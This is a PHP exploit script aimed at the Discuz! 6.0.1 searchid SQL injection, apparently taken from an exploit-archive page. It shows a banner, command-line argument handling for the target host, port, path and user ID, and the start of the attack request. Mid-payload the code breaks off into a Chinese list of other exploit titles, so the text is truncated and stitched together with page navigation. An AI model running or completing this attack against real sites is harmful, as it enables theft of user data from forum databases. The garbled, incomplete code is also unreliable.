<?php
error_reporting(E_ALL&E_NOTICE);
print_r("
------------------------------------------------------------------
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY james
------------------------------------------------------------------
");
if($argc>4)
{
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$uid=$argv[4];
}else{
echo "Usage: php ".$argv[0]." host port path uidn";
echo "host: target server n";
echo "port: the web port, usually 80n";
echo "path: path to discuzn";
echo "uid : user ID you wanna getn";
echo "Example:rn";
echo "php ".$argv[0]." localhost 80 1n";
exit;
}
$content ="action=search&searchid=22
【Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit】相关文章:
★ Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit
★ pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit
★ Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)
★ pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability
★ Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit
★ BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)
★ PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit
★ Dana IRC 1.4a Remote Buffer Overflow Exploit
★ fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)
★ Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability